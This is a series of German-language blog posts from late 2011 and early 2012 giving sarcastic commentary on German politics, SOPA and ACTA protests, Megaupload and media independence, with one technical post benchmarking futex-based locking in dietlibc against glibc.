[l] Wow! Der ORF wehrt sich gegen parteipolitische Einflussnahme. Sehr schön, liebe ORF-Mitarbeiter! Wer sich jetzt denkt, hey, das kommt mir bekannt vor, das ZDF ist ja auch im Grunde eine PR-Unterabteilung der CDU, der wird sich freuen, dass sich auch beim ZDF Widerstand formiert, wenn auch in kleinerem Ausmaß. Das liegt m.E. daran, dass die Politik Deutschland erfolgreich zu einem Niedriglohnland gemacht hat, in dem niemand mehr ein Sicherheitspolster hat und sich mit einem Jobverlust gleich existenzielle Ängste verbinden.
Money Quote aus dem ZDF-Protestschreiben:
Wir paar jungen Nachwuchs-ZDFler müssen leider anonym bleiben, um unsere (meist befristeten/wackligen) Verträge nicht zu gefährden. WIR möchten auch noch in ein paar Jahren in einem (nahezu) unabhängigen ZDF arbeiten. Wobei WIR niemals mehr so hohe Pensionsansprüche werden verjubeln können, wie es den Hierarchen, die ein Filz-System im Haus aufgebaut haben, möglich ist.

Wed Jan 25 2012

[l] In England hat ein Richter entschieden, dass auch ein "nachgemachtes" Bild das Copyright verletzt. Die beiden Fotos sind nicht mal aus dem selben Winkel aufgenommen und wirken beide nicht schutzwürdig von der Qualität her. Aber seht selbst. Es geht um Nachbearbeitungen in ähnlichem Stil, gar nicht um die Fotos selber, denn das basiert ja offensichtlich auf verschiedenen Fotos. (Danke, Christoph)

Tue Jan 24 2012

[l] Der Herausgeber einer jüdischen Zeitung in Atlanta, Georgia, ist zurückgetreten. Er hatte zuviel in einer Kolumne schwadroniert, dass es ja nur drei Möglichkeiten für Israel gäbe, mit der Bedrohung durch den Iran umzugehen. Und eine der drei Optionen war:
One was a "hit on a president in order to preserve Israel's existence."
Nun hätte ich spontan gedacht, dass damit Achmedinedschad gemeint ist, aber der Secret Service las das so, dass hier zur Ermordung Obamas aufgerufen wird.
Nun ist dieser Typ zurückgetreten und hat sich tränenreich entschuldigt. Nicht weil er einsieht, dass er Mist gemacht hat, sondern:
“It’s storming outside as we speak, and I’ve always felt that when a storm happens that God’s angry with me,” Adler said.
Ah, ein Sturm, ganz klar ein Zeichen Gottes!1!!
Update: Das Zitat war irreführend, der Artikel selbst lässt keinen Zweifel daran, dass Obama gemeint ist. (Danke, Alexander)

Fri Jan 20 2012

[l] Hier gehen gerade einige Mails ein, wieso ich mich nicht hinter Kimble schlage, immerhin ist das ja ein unerhörter Eingriff in die Netzinfrastruktur, wie die Amis da gerade die ganzen anderen Länder zu ihren IP-Schoßhunden gemacht haben.
Liebe Warez-Doods, lest euch bitte nochmal Kimbles Geschichte durch. Megaupload ist wie seine erste BBS. Als die damals hochgenommen wurde, hat Kimble mit dem inzwischen verflossenen RA Gravenreuth zusammengearbeitet, um seine Kunden und den Rest der Szene ans Messer zu liefern. Was glaubt ihr denn, wass Kimble jetzt mit den Weblogs von Megaupload machen wird? Ihr habt doch hoffentlich nicht für eine Sekunde geglaubt, dass der da schon keine Logs aufheben wird, um euch zu schützen?
Bei Rapidshare gibt es einen Hauch von einem Zweifel, ob es da neben Warez-Infrastruktur auch noch einen legitimen Nutzen gibt, aber bei Megaupload? Puleeze! Kimble stand die ganze Zeit mit einem Bein im Knast, und sein Plan war offensichtlich, das wie damals mit der BBS zu machen, wenn er mal Probleme hat.
Ich schätze die Amis aber so ein, dass sie ihn jetzt verarschen werden. Ich glaube die werden ihm einen Deal anbieten, seine Daten nehmen, und ihn dann trotzdem einknasten.

Thu Jan 19 2012

[l] Wulffs Pressesprecher ist anscheinend nicht ohne Grund zurückgetreten. Jetzt hat die Staatsanwaltschaft Hannover bei ihm eine Durchsuchung gemacht. Na mal gucken, ob davon was bei Wulff kleben bleibt.

Wed Jan 18 2012

[l] So, heute ist SOPA-Blackout-Tag, und der CCC hat mal auch gleich zum äquivalenten Europaprotest gegen ACTA und BREIN aufgerufen.
Google hat ihr Logo zensiert und linkt hierauf. Die englische Wikipedia hat auch zugemacht. SOPA ist ja schon zu den Akten gelegt, aber das würde ich mal als Nebelkerze werten. Seit Schäuble diese unsägliche Testballonstrategie eingeführt hat, machen die ganzen Repressionsregimes auf der ganzen Welt das so. Kommen mit immer unerträglicheren Knebelgesetzen, und wenn es zu viel Widerstand gibt, dann wird es "auf Eis gelegt" und nächsten Monat unter anderem Namen nochmal versucht, und wenn das auch nicht klappt, dann macht man es halt über die EU oder irgendein internationales Abkommen.
Update: Die Reaktionen auf den Wikipedia-Blackout sind durchaus unterhaltsam.
Update: Oh da sind ja richtig viele Sites zensiert heute. Auch fark, reddit, imgur, die mozilla foundation, techcrunch, boingboing, wordpress.com, und sehr schön finde ich auch den Ansatz von xda-developers, die da Protest-Unterschriften sammeln und nach 50000 wieder online gehen wollen. 41k haben sie schon. EFF und die FSF sind natürlich auch am Start.
Twitter macht zwar nicht mit, aber das trending topic ist gerade #IfTheyShutDownTwitter. Die Bevölkerung hat das also schon mitgekriegt.

Sat Jan 14 2012

[l] Wow! Die für ihre Filesharing-Massenabmahnungen berüchtigte Kanzlei Rasch hat von dem OLG Düsseldorf mächtig aufs Maul gekriegt.
[…] qualifiziert das OLG Abmahnungen der Kanzlei Rasch als "völlig unbrauchbare anwaltliche Dienstleistung". Zudem verschob es in der Entscheidung vom 14.11.2011 die Beweislast zugunsten der Abgemahnten (Az.: I-20 W 132/11).
Also für so eine Ohrfeige müssen die ja schon wirklich tief ins Klo gegriffen haben mit ihrer Abmahnung. Oder vielleicht ist auch mal die Tochter des Richters von denen abgemahnt worden oder so, wer weiß :-)

Fri Jan 6 2012

[l] Das Skript für Bradley Mannings Anhörung ist geleakt. Ein Skript, wundert ihr euch? Ach das ist ganz normal. Das haben die Russen damals in den 50ern auch so gemacht bei ihren Schauprozessen. Das spart enorm Aufwand.
[l] Angeblich wurde der Indische Militärgeheimdienst gehackt. Und was haben sie da gefunden, die Hacker? Die Sourcen von diversen Softwarefirmen, die Abkommen mit Indien gemacht haben, u.a. Symantecs Snake Oil wohl. Wenn das also in irgendwelchen Tauschbörsen auftaucht gerade, dann wisst ihr ja, wo es herkommt.
Apropos Indiens Schnüffelprogamme: diese Dokumente sehen aus, als hätte Indien da Marktzugang für Schnüffelzugänge verkauft.
[l] Interessante Erklärung für SOPA. Ich fass mal zusammen: SOPA ist eine Erpressung der Internetfirmen durch die Politiker. Politiker werden von allen anderen Branchen geschmiert und "beschenkt", kriegen "Spenden", aber Google und co haben sich zurückgehalten, besonders wenn es um Geld für fiese Arschlöcher geht. Also haben sich die fiesen Arschlöcher zusammengetan und das übelste Anti-Google-Gesetz gemacht, das ihnen eingefallen ist, und Google läuft jetzt los und schmiert die Arschlöcher, um das Gesetz loszuwerden.

Wed Jan 4 2012

[l] China kürzt den Entertainment-Anteil im Fernsehen zusammen. Das sollten wir vielleicht auch mal machen.
The State Administration of Radio, Film and Television (SARFT) ordered broadcasters to stop showing "excessive entertainment", and to air at least two hours of news each evening from January 1.
Das ist doch mal eine gute Sache. Jetzt müsste man nur noch garantieren, dass die Nachrichten von freier und unabhängiger Presse gemacht werden und keiner Zensur unterliegen. Und wir könnten uns davon mal eine Packung abschneiden und zum Anfang mal diese ganzen Privatsender komplett abschalten.
Bei den Chinesen scheint das auch zum "Erfolg" geführt zu haben:
"Satellite channels have started to broadcast programmes that promote traditional virtues and socialist core values," Xinhua said Tuesday, citing SARFT.
[l] Bei Netzpolitik.org gibt es ein Wulff-Interview, das er ARD und ZDF gegeben hat. Das steht wohl noch unter Sperrfrist, aber das mp3 ist halt geleakt. Und die haben auch gleich ein Transkript gemacht.
Das ist aus meiner Sicht zu ähnlich hohen Teilen Mimimi, "ich bin hier das Opfer", "die Scheiß Presse hat mich verunglimpft" und zwei drei kreative Auslegungen der Realität. Man muss übrigens würdigen, wie schön spontan und kritisch nachhakend das klingt, zumal es da wohl mittags ein Vorgespräch gab und die Fragen und Antworten vorbereitet waren. Dafür klingt das beeindruckend spontan alles. Insgesamt dennoch eine ziemlich unwürdige Geschichte, gänzlich unüberzeugend. Der soll das Fremdschämen beenden und endlich zurücktreten.
Update: Oh, die Tagesschau dementiert, dass es eine inhaltliche Absprache der Fragen gab.

Sat Dec 31 2011

[l] In den USA brennt gerade die Luft wegen SOPA. Erst gab es einen fetten Shitstorm gegen Godaddy, ein großer Domainregistrar und SSL-Zertifikat-Verkäufer. Die hatten sich offen hinter SOPA gestellt, und daraufhin kam es zu Boykottaufrufen und es haben wohl tatsächlich eine Menge Leute ihre Domains abgezogen. So viele, dass Godaddy nicht nur ein Callcenter losschickte, um die Kunden abzuhalten, und angeblich sogar eine "man muß ein Passphoto hinschicken zum Domain-Kündigen"-Policy eingeführt, sondern sogar öffentlich ansagte, dass sie doch nicht mehr SOPA supporten wollen. Daraufhin guckte mal jemand nach und stellte fest, dass sie immer noch auf der Supporter-Liste standen, und der Shitstorm intensivierte sich noch ein bisschen.
Das hat soviel Eindruck gemacht, dass es jetzt plötzlich cool und hip ist, gegen SOPA zu sein, dass Google, Amazon und Facebook angeblich über ein Protest-Selbstabschalten nachdenken und sogar Nintendo, EA und die Videospielsparte von Sony ihren SOPA-Support zurückgezogen haben. Jetzt nach Weihnachten haben die eh erst mal Flaute, und das will sich wohl keiner leisten, die paar Käufer wegen sowas zu verlieren.
So schön das aussieht, so klein ist in meinen Augen der Sieg hier. Denn SOPA ist ja nur eines in einer langen Reihe solcher Gesetze. Nächsten Monat kommt dann bestimmt die nächste Iteration.
Aber hey, Siege soll man feiern wie sie kommen. In diesem Sinne: Hoch die Tassen!
Vielleicht kommt ja auch bei unseren "Netzpolitikern" die Botschaft an.
Update: Hahaha, auch bei den Spieleherstellern war der Rückzug nur geheuchelt.

Thu Dec 29 2011

[l] Ihr hab das ja sicher mitgekriegt mit Google und Firefox, dass die Einnahmen der Mozilla-Foundation zu sowas wie 90% aus einem Deal mit Google bestehen. Google gibt denen Millionen dafür, dass die Default-Search-Engine in Firefox Google ist. Der Vertrag lief kürzlich aus, und weil Chrome Firefox gerade überholt hat oder zumindest ähnlich stark ist, gab es Spekulationen, dass Google das nicht verlängern könnte.
Haben sie am Ende doch gemacht. Jetzt kommen dazu spannende Details heraus, und zwar soll Microsoft ein Gegenangebot gemacht haben an Mozilla, damit die Bing als Default-Suchmaschine einbauen, und das soll so hoch gewesen sein, dass Google jetzt dreimal so viel an Mozilla zahlt wie letztes Mal. Bwahahaha, also Wirtschaftskrieg will man gegen Microsoft echt nicht führen müssen, die wissen schon was sie da tun.

Wed Dec 28 2011

[l] Vielleicht fragt ihr euch auch gelegentlich, was die Amis eigentlich machen, wenn sie bei einem Verdächtigen eine Festplattenverschlüsselung vorfinden und die Passphrase nicht haben. Nun, hier erzählt ein Angeklagter, der Secret Service habe denjenigen schlicht von der Türkischen Nationalpolizei foltern lassen, bis er die Passphrase rausrückte. Geht los auf Seite 19. Der Teil davor ist auch ganz allerliebst, da beklagt er sich, dass er die Verbrechen ja als Informant des Secret Service auf deren Anweisung gemacht hat, und die ihm zugesichert haben, dass sie ihn straffrei halten würden.
[l] Neuer Tag, neues Glück: Über den Wulff blubbert neuer Klärschlamm hoch. Wieder geht es um Kredite, wieder hat er Sonderkonditionen gekriegt, und diesmal war er auch noch Koordinator der Reform der Landesbanken und damit der Muttergesellschaft der Bank, bei der er seine Sonderkonditionen gekriegt hat.
Für mich ist ja der bemerkenswerteste Teil daran, dass da kein Hahn nach krähen würde, wenn der Wulff sich nicht immer so aus dem Fenster gelehnt hätte, um Verfehlungen bei anderen anzukreiden und von Politikern allgemein und dem Bundespräsidenten speziell moralische Vorbildfunktion einzufordern.
Außer Wulff hat doch nie irgendjemand irgendwelche Illusionen gehegt, was für eine widerwärtige korrupte politische Klasse wir da haben. Wenn die könnten, würden sie sich gegenseitig vom Verfassungsschutz abhören lassen. Oh wartet, haben sie ja gemacht.
Oh übrigens: der Kredit jetzt, das ist der, mit dem er den anderen stinkenden Kredit abgelöst hat. Den dieser Unternehmer angeführt hat, um zu entkräften, dass seine Kredit-Konditionen so besonders vorteilhaft gewesen seien, denn immerhin hat der Wulff ja woanders noch bessere Konditionen gekriegt!1!!

Sat Dec 24 2011

[l] Kriegt ihr eigentlich gerade die Sache mit Erdogan und Sarkozy mit? Das ist Popcornkino vom Feinsten. Im Hintergrund ist die Sache mit dem Völkermord an den Armeniern, das war Anfang des 20. Jahrhunderts unter der Verantwortung des Osmanischen Reichs, d.h. bevor es die Türkei war. Aber die Türkei hat das bis heute nicht als Genozid anerkannt und alle möglichen abgehalfterten Pseudopolitiker versuchen da seit Jahren PR-Kapital draus zu schlagen, dass sie das öffentlich ansprechen. Nun ist es natürlich ein valider Standpunkt, dass Völker ihre Verbrechen nicht einfach leugnen sollen, aber die üblichen Verdächtigen haben ja alle selber Dreck am Stecken.
Einer dieser PR-Politiker ist Sarkozy, denn Frankreich hat gerade ein Gesetz verabschiedet, dass das Leugnen von Völkermord unter Strafe stellt, und da fallen eben auch die Armenier drunter.
Die Türkei hat reagiert, indem sie ihre Botschafter aus Frankreich abgezogen hat. Und außerdem wirft Erdogan jetzt Frankreich Völkermord vor, und zwar in ihrer Kolonie Algerien.
"Frankreich hat in Algerien von 1945 an als Kolonialmacht 15 Prozent der Bevölkerung massakriert. Das ist ein Völkermord"
Erdogan versucht jetzt, diesen Gesetzesentwurf als Anti-Moslem-Propaganda darzustellen und so die Moslems hinter sich zu einigen. Aber der größte Lacher an dem Troll war, dass er auch eine Botschaft für Sarkozy persönlich hatte:
Erdogan riet Sarkozy, seinen Vater Pal Sarkozy zu befragen, der als Fremdenlegionär im Algerien im Einsatz gewesen sei. "Ich bin mir sicher, dass Pal Sarkozy seinem Sohn viel über die Massaker berichten kann", so Erdogan.
Harrharrharr, well played. Natürlich ist der Vater von Sarkozy entsetzt und schockiert und streitet alles ab.
"Ich war nie in Algerien", sagte der Vater des Präsidenten am Freitagabend dem französischen TV- Sender BFMTV. "Ich bin nie über Marseille hinausgekommen."
Man achte darauf, wie der Vater gar nicht bestreitet, dass die Franzosen dort einen Völkermord gemacht haben, nur dass er dabei war.

Wed Dec 21 2011

[l] Rechtzeitig zu Weihnachten hebt der Bundestag das Flugverbot für Drohnen im zivilen Luftraum auf. Damit sind nicht die Basteldrohnen gemeint, mit denen wir beim Camp oder Congress gerne rumspielen, sondern das ist größeres Gerät, 150 kg bis zu einer halben Tonne. Und dreimal dürft ihr raten, wer dahintersteckt!
Angeführt vom EADS-Konzern hat sich die europäische Militärindustrie dennoch seit Jahren für die Zulassung unbemannter Flugzeuge auch im zivilen Luftraum stark gemacht. Unterstützung erhält die Waffenbranche dabei nicht nur von den Militärs, sondern auch von den Polizeibehörden verschiedener Mitgliedsstaaten.
Damit ist dann ja wohl auch klar, wofür die eingesetzt werden sollen. Ich musste spontan an diesen schönen Film hier denken.
[l] Ich habe heute mal wieder ein bisschen an der dietlibc herumgehackt. Das Ziel war diesmal, die pthread-Library zu aktualisieren. Die stammt noch aus Linux 2.4-Zeiten und brauchte da gruselige Workarounds für Probleme, die inzwischen längst ausgeräumt wurden, und skaliert auch nicht gut. Der Test, mit dem ich das Skalieren gemessen hatte, und von wo meine Einschätzung kam, ist von 2003 und hat einfach nur einen Haufen Threads aufgemacht und geguckt, wieviel Zeit jeweils zum Erzeugen benötigt wird. Und da konnte man bei glibc mit nptl damals schön sehen, dass die Zeit nicht mehr wurde mit der Anzahl der Threads, während das bei der dietlibc doch so war.
Seit dem gibt es in Linux einige mehr oder weniger geniale Änderungen, die wir nie unterstützt haben, weil Multithreading nie so richtig wichtig war für die dietlibc. Mir schonmal eh nicht so, aber auch die Zielplattformen haben normalerweise nie mehr als einen Core gehabt. Das hat sich inzwischen geändert.
Die erste wichtige Neuerung ist Thread Local Storage. Das funktioniert so, dass man in den Threads auf x86 ein Segment-Register so belegt, dass man über das Segment ab Offset 0 auf den Thread-Parameter-Block zugreifen kann. Es ist auch vorgesehen, dass man selbst in seinem Code Variablen thread local deklarieren kann, aber den Sinn davon habe ich nie gesehen, die kann man ja auch gleich auf den Stack tun oder vom Heap allozieren, wenn sie größer sind. Der Punkt ist jedenfalls, dass alle möglichen Thread-Funktionen wissen müssen, welcher Thread sie gerade aufruft, z.B. können Mutexe rekursives Locking erlauben und müssen daher wissen, ob dieser Lockversuch vom selben Thread kam wie der ursprüngliche. Kurz gesagt: bei Threading-Code war es immer ein Flaschenhals, wenn der Code gucken musste, welcher Thread das eigentlich gerade ist. Die Alternativen sind alle doof; man könnte einen Syscall aufrufen, um die PID oder TID zu kriegen, oder man könnte den Stack Pointer nehmen und in einer globalen Datenstruktur nachgucken (allerdings muss die dafür gelockt werden und wie gesagt müssen Mutexe auch die Thread-ID wissen). Mit Thread Local Storage ist das nur noch ein einziger Speicherzugriff über das Spezial-Segment. Das war also schonmal gut, aber ich hab immer das Gefühl gehabt, ich müsste jetzt auch Futex-Support implementieren, um überhaupt in einer Liga wie NPTL spielen zu können. Das habe ich heute mal gemacht, und die Ergebnisse sind ernüchternd.
Der alte Code in dietlibc benutzt im Wesentlichen Spinlocks, d.h. eine Schleife, die immer wieder versucht, den Lock zu kriegen, bis es halt klappt. Damit dabei nicht die CPU so doll belastet wird, sagt er zwischen den Iterationen dem OS, dass mal ein anderer Thread laufen soll jetzt. Sieht sehr krude und amateurhaft aus, fand ich immer.
Futex, zum Vergleich, ist ein geradezu geniales Verfahren. Man nimmt sich dafür den Lock, also eine Speicherstelle, und zählt den mit einer atomaren Operation von 0 auf 1 hoch. Wenn nach dem Hochzählen 1 drin steht, dann weiß man, dass man den Lock hat und sonst niemand. Wenn dann da 2 oder so drinsteht, dann hat man den Lock nicht, und benutzt den futex-Syscall, um dem Kernel zu sagen, dass man auf diesen Lock hier warten will. Der Kernel suspendiert dann den Thread.
Beim Unlock geht man analog vor; man zieht atomar einen ab, und wenn man bei 0 rauskommt, ist alles gut und man ist fertig, ansonsten ruft man den Futex-Syscall auf und sagt an, dass man mal einen der wartenden Threads aufgeweckt haben will. Es gibt da noch zwei-drei Komplikationen aber im Wesentlichen ist es das. Den Syscall benutzt man nur, wenn man nicht im Userspace über die atomaren Operationen schon alles geklärt hat.
glibc hat über NPTL seit vielen Jahren Futex-Support.
Mein Test-Programm ist untypisch, denn es macht vier Threads auf, die alle dauernd um den selben Lock konkurrieren. An sich sind Locks ja genau auf den anderen Fall optimiert, nämlich dass es keinen Wettbewerb gibt im Normalfall, insofern ist das kein sonderlich guter Test, aber es ging ja ursprünglich auch gar nicht um den Durchsatz, sondern die Threads prüfen auch, ob sie tatsächlich als einzige Zugriff hatten.
Hier ist der Durchsatz (am Anfang insgesamt und die vier Zahlen am Ende sind für die einzelnen Threads):
```
glibc:
5840543 iterations: 1450529 1436218 1478655 1475141.dietlibc alt:
80426491 iterations: 18957811 16267831 19589958 25610891.
dietlibc neu mit futex:
11477382 iterations: 2868532 2830930 2876189 2901731.
```
Die Ergebnisse haben mich ja nun doch massiv überrascht. Falls sich jemand den Code mal angucken will: hier ist er. Ich habe den neuen Futex-basierten Locking-Code dann lieber doch nicht eingecheckt angesichts dieser Zahlen :-)
Oh, einen noch. Es gibt da noch eine Optimierung, die man gerne macht beim Locking. Man ruft nicht sofort den Kernel an, sondern probiert es erst ein paar Mal. Der Gedanke dahinter ist, dass normalerweise so ein Lock ja nur sehr kurz gehalten wird, und man sich den Syscall-Overhead auch sparen kann, wenn der, der den Lock gerade hält, nur mal kurz ein-zwei Variablen schreibt und ihn dann wieder freigibt. Das hat mein Futex-Code natürlich auch getan. Und zwar erst 100 Mal, dann nur noch 10 Mal. Hat den Durchsatz signifikant erhöht, das auf 10 zu senken. Das hat mich auch überrascht.
Update: Falls ihr mal eure libc testen wollt: das lief auf einem 64-bit Linux auf einem Phenom 1090T (3.2 GHz, 6 cores).

Tue Dec 20 2011

[l] NPD-Politiker zuhause eingemauert.

Sun Dec 18 2011

[l] Ein japanischer Journalist hat sich undercover in Fukushima als Aushilfe anstellen lassen und berichtet. Der hat auch mit versteckter Kamera ein Video gemacht. Da müsste mal jemand Untertitel für machen, er erklärt das Video natürlich auf japanisch. Aber für einen visuellen Eindruck reicht es.

Sat Dec 10 2011

[l] Ausrede der Woche: Auf die Frage, was diese Drohne eigentlich im Iran gemacht hat:
U.S. officials tell NBC that CIA operators were flying the unmanned drone when it veered out of control and headed deep into Iran.
Mit anderen Worten, die Iraner selbst haben die Drohne geklaut, als sie noch so gut wie über Afghanistan rumflog und sich da an der schönen Landschaft ergötzte!1!!

Fri Dec 9 2011

[l] Die Geschichte mit dem neuen Verbraucherschutzsenator von Berlin gärt weiter vor sich hin und dabei blubbern da gerade ein paar stinkende Details aus dem Morast hoch, z.B. dass Braun noch am 19. November 2011 einen solchen Vertrag gemacht hat; seine Vereidigung war am 28. November, also keine zwei Wochen später. Unter diesen zeitlichen Umständen erscheinen mir seine "ich weiß die Details nicht mehr"-Erklärungen nicht sonderlich glaubwürdig zu sein.

Thu Dec 8 2011

[l] Ich hatte ja berichtet, dass die Amis die Pakistaner jetzt hinreichend verärgert haben, dass die die Nachschubwege zugemacht haben. Nun, was bleibt da, da kann man z.B. Tanklastwagen-Konvoys durch das von Taliban-Terroristen kontrollierte Land machen. Das haben sie versucht, und die sind ihnen — Überraschung!1!! — immer weggesprengt und -geschossen worden. Und jetzt? Jetzt fliegen (!) sie den Sprit zu ihren Militärbasen und zahlen dafür dann pro Gallone (knapp vier Liter) Sprit sowas wie $400.But the Pentagon is stuck with the expense for the foreseeable future, especially given the recent deterioration in U.S.-Pakistani relations.So ist das halt. Das sind halt die Kosten der Kriegsführung. Nur weil das extrem ultra-teuer ist, beendet doch ein Land wie die USA einen sinnlosen Krieg nicht.

Tue Dec 6 2011

[l] Mir kam gerade eine großartige Idee für die Meldung mit der Versteigerung der Filesharing-Abmahnungs-Forderungen. Wisst ihr, was man damit machen sollte? Das in Risikoklassen aufteilen und strukturierte Investment-Vehikel daraus bauen! Da haben wir doch bisher immer gute Erfahrungen mit gemacht!1!!

Mon Dec 5 2011

[l] Der neue Berliner Senator für Justiz und Verbraucherschutz scheint ein echter Glücksgriff zu sein.
Seinem Justiz- und Verbraucherschutzsenator Braun wird vorgeworfen, als Notar dubiose Immobiliengeschäfte beglaubigt zu haben, in Serie und zum Schaden kleiner Leute, die in Schrottimmobilien investierten. Braun hat die Vorwürfe als "unrichtig" zurückgewiesen und die Notarkammer gebeten, sie "zu bewerten". Die Kammer hielt sich zunächst bedeckt, man will den Fall erst intern besprechen.
Das Prinzip geht so, dass betrügerische Immobilienvertriebe den Leuten mit dem Versprechen von Steuerersparnis minderwertige Wohnungen aufschwatzen, und das muss dann natürlich auch schnell gehen, damit der Kunde keine Zeit hat, sich zu informieren. Da braucht man dann einen flexiblen Notar für, der auch schnell-schnell auf Zuruf verfügbar ist, auch mal am Wochenende oder mitten in der Nacht. Na und was sagt denn jetzt die Notarkammer?
Strafbar ist diese Hopplahopp-Beglaubigung nicht, bestätigt die Notarkammer. Ein Notar muss den Käufer nur warnen, wenn er weiß, dass es um Schrottimmobilien geht. Das habe er nicht gewusst, sagt Senator Braun. Unabhängige Berliner Verbraucherschützer bezweifeln das.
Um das Bild zu vervollkommnen: in Berlin soll es nur etwa zehn Notare gegeben haben, die mit solchen Immobilienvertrieben Geschäfte gemacht haben.

Sun Dec 4 2011

[l] Großartige Idee des Tages: [Griechenland könnte doch zum Dollar wechseln!1!!] (Den Link hab ich weggemacht, weil mir irgendwelche armen Windows-User schrieben, sie hätten sich darüber einen Driveby-Download eingefangen. Sagt mal, Leute, patcht ihr alle eure Software nicht?!)

Sat Nov 26 2011

[l] Die Nato hat "versehentlich" 24 Pakistanische Soldaten getötet, als sie mit Hubschraubern und Kampfjägern aus auf zwei Armee-Checkpoints in Pakistan geschossen haben. Also hat Pakistan die Grenze für den Nato-Nachschub zugemacht.
Die Nato hat mit dem üblichen "wir prüfen das"-Gewäsch reagiert, das eh keiner mehr glaubt, und eine schleimige Konjunktivitis-"Entschuldigung" angehängt:
"My most sincere and personal heartfelt condolences go out to the families and loved ones of any members of Pakistan security forces who may have been killed or injured," said Gen. John Allen, the top overall commander of U.S. and NATO forces in Afghanistan in a statement.
Nee, klar, "most sincere and personal heartfelt" *göbel* Klar, das geht denen so nahe bei der Nato, dass sie seit Jahren Zivilisten umbringen und post mortem zu Terroristen machen, damit die Statistik mit den Kollateralschäden nicht so übel aussieht.
[l] Ströbele hat gerade mit Anlauf ins Klo gegriffen. Es geht um irgendeine bekloppte Aktion an einem See in Heddesheim (bei Mannheim). Ströbele machte dort mit seiner Frau Urlaub, sie schwammen angeblich an einer Stelle, wo schwimmen verboten aber angeln erlaubt war, wurden dann von ein paar angelnden Kids von einem Anglerverein versehentlich getroffen, als die Futterkugeln mit einer Zwille ins Wasser schossen, und danach wird es unübersichtlich. Unstrittig scheint zu sein, dass die Kids sich zu entschuldigen versucht haben, und dass man da nicht hätte schwimmen dürfen. Ein Lokalblog berichtete, Ströbele habe daraufhin die Kids wegen "gefährlicher Körperverletzung mittels einer Waffe" angezeigt. Das alleine ist ja schon mehr als unsouverän und ein moderat tiefer Griff ins Klo.
Aber dann komm der eigentliche Hammer, denn Ströbele hat auch noch über den bekannten Medienanwalt Eisenberg eine Abmahnung an das Blog geschickt, weil er sagt, nicht er sondern seine Ehefrau in seinem Beisein habe die Anzeige gemacht. Pikanterweise hatte die Staatsanwaltschaft dem Blog auch noch bestätigt, dass Ströbele der Anzeiger war vorher. Laut lawblog bewegt er sich da auf dünnem Eis. Der Punkt ist jedenfalls, dass Ströbele sich damit jetzt verdient einen ordentlichen Streisand-Effekt eingefahren hat, da helfen auch keine Ausflüchte. Die ganze Aufmerksamkeit für die Geschichte hat er mit der Abmahnung erst losgetreten.
Lieber Herr Ströbele, wenn Sie das hier lesen: ziehen Sie ganz schnell den Eisenberg zurück, entschuldigen Sie sich bei dem Blog, ziehen Sie die Anzeige zurück und spenden Sie dem Anglerverein eine Monatspackung Fischfutter, und thematisieren Sie dann innenpolitisch, dass wir mehr Schwimmgelegenheiten in der Natur brauchen. Alles andere hinterlässt ein blaues Auge bei Ihnen. Übrigens sei mal darauf hingewiesen, dass ich diese ganze Geschichte erst gar nicht glauben wollte, weil Sie als einziger in dem ganzen Politzirkus als souverän und integer galten. Das haben sie nachhaltig zerstört mit dieser Aktion.
[l] Die Commerzbank will dann mal ihre Krisenpapiere in eine Bad Bank auslagern, damit der Steuerzahler haftet. Wer sich jetzt denkt, hey, gute Idee, wieso haben sie das nicht schon viel früher gemacht… Nun, äh, haben sie ja schon, 2009.

Tue Nov 15 2011

[l] Friedrich redet sich bei N24 um Kopf und Kragen, fordert mehr Überwachung, eine neue Kommission, eine Verbunddatei. Money Quote bei ca 2 Minuten:
Wie kann man sicherstellen, dass wenn jemand das Bundesland verlässt, dass andere aufmerksam gemacht werden?
Mit anderen Worten: wenn jemand das Bundesland wechselt, fällt er aus dem Raster. Außer bei islamistischem Terrorismus. Oh und bei 4:10 erklärt er, wieso sie nicht gemerkt haben, dass sie es mit Rechtsterrorismus zu tun haben. Weil es keine Bekennerschreiben gab. Und da kam dann niemand auf die Idee, es könne sich um Terrorismus handeln. (Danke, Alex)
[l] Mir erzählt gerade jemand über drei Ecken, wie das BMI gerade in der Öffentlichkeit das 0zapftis-Debakel zu spinnen versucht. Das bezieht sich auf ein Gespräch mit einer "Dame vom BMI", insofern a) mit Vorsicht genießen, b) muss das gar nicht die offizielle Linie und kann auch nur die kognitive Dissonanz dieser Frau sein, und c) als Gerücht betrachten.
Die Kernaussage war: das BMI hat ja weder technisch noch juristisch die Kompetenz, so einen Trojaner zu machen, zu beurteilen oder auch nur eine Spec zu schreiben. Da sei "die Community gefragt". Oh und wir haben ja eine sehr gut funktionierende Demokratie, weil ja die gemachten Fehler vom CCC augedeckt wurden.
Da braucht man kein Brechmittel mehr. Schwarz-Geld, denn sie wissen nicht, was sie tun!

Thu Nov 10 2011

[l] Oh super: Die EU hat sich mit den USA zur Weitergabe der Fluggastdaten verständigt. Die USA haben ein paar nebulöse "Zusagen" gemacht, die wieder niemand prüfen wird, und die EU ist sofort umgekippt. Wer sich jetzt fragt, hey, welcher Versager hat denn da für die EU die Verhandlungen geführt, … nun, äh, da kommt ihr NIE drauf!1!!
Dabei sei eine "große Verbesserung" beim Schutz der Privatsphäre der EU-Bürger erzielt worden, sagte EU-Innenkommissarin Cecilia Malmström der "Frankfurter Allgemeinen Zeitung" (FAZ).
Na dann war da ja auch nichts zu erwarten.
[l] Dass in unserem Lande Hausdurchsuchungen gerne mal der Einschüchterung und nicht der Wahrheitsfindung dienen, das hat sich ja schon der eine oder andere zusammengereimt. Aber jetzt gibt es eine Bestätigung, und zwar sogar von einem Richter: Richter stoppt Hausdurchsuchung bei zwei kritischen Polizisten, die auf Missstände aufmerksam gemacht hatten. Also klassisches Whistleblower-Plattmachen. Money Quote:
Das Amtsgericht Offenbach attestierte den Ermittlern im Juni, sie hätten gegen die kritischen Polizeibeamten ins Blaue hinein ermittelt.
Und weiter:
Der Verdacht gegen die Beamten beruhe auf reiner Spekulation. Sogar die Grundvoraussetzung für die Durchsuchung der Wohnung fehle, nämlich der Tatverdacht für eine strafbare Handlung, erklärte der Ermittlungsrichter.
Die konnten sich nichtmal glaubwürdig einen Tatverdacht aus dem Arsch ziehen! Gut, das hält Richter normalerweise nicht davon ab, die Hausdurchsuchung zu genehmigen, daher: Hut ab für den Richter. Schade, dass Richter offenbar nur bei Durchsuchungen gegen Polizisten auf die Idee kommen, dass da was nicht stimmen könnte.
Oh und wieso ist das schon wieder Hessen, wo Leute dafür verfolgt werden, dass sie ihre Arbeit gut machen?

Tue Nov 8 2011

[l] Die GEMA hat übrigens eine Gegenstrategie gegen die Verbreitung der freien Lizenzen: Drauf scheißen, trotzdem GEMA-Gebühren kassieren, und die Beweislast umkehren.
